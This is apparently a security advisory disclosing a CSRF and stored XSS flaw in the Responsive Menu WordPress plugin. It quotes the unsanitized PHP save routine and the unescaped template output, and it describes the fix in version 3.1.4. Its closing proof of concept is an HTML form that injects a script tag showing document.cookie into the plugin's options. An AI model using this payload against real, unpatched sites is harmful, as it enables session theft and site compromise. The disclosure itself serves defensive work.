Recently we found that the plugin Responsive Menu had a cross-site request forgery (CSRF)/cross-site site scripting (XSS) vulnerability.

The CSRF portion of the vulnerability was due to a lack of a nonce on the plugin’s admin page and a lack of a check for a valid one when processing a request to change the plugin’s options.

For the XSS portion, in the file /app/Controllers/AdminController.php the function updateOptions() saves the options and no sanitization is done:

22
23
24
25
26
27
28

public function updateOptions(array $options) {
	$updated_options = $this->combineOptions($options);
	foreach($updated_options as $name => $val):
		$val = is_array($val) ? json_encode($val) : $val;
		$val = stripslashes($val);
		$updated_options[$name] = $val;
		$this->db->update('responsive_menu', ['value' => $val], ['name' => $name]);

Then, for example, the option “menu_to_hide” item is configured to be output through the file /css/app.css.twig without being escaped:

{% if options.menu_to_hide %}
	{{ options.menu_to_hide }} {

After we contacted the developer they released version 3.1.4, which fixes the vulnerability by fixing the CSRF portion of it by adding a nonce and a check to insure that a valid nonce is included when saving the plugin’s settings.

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the frontend of the website, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=responsive-menu" method="POST">
<input type="hidden" name="menu[menu_to_hide]" value="</style><script>alert(document.cookie);</script>">
<input type="submit" name="responsive-menu-submit" value="Submit" />
</form>
</body>
</html>

Timeline

• May 22, 2017 – Developer notified.
• May 22, 2017 – Developer responds.
• June 10, 2017 – Version 3.1.4 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?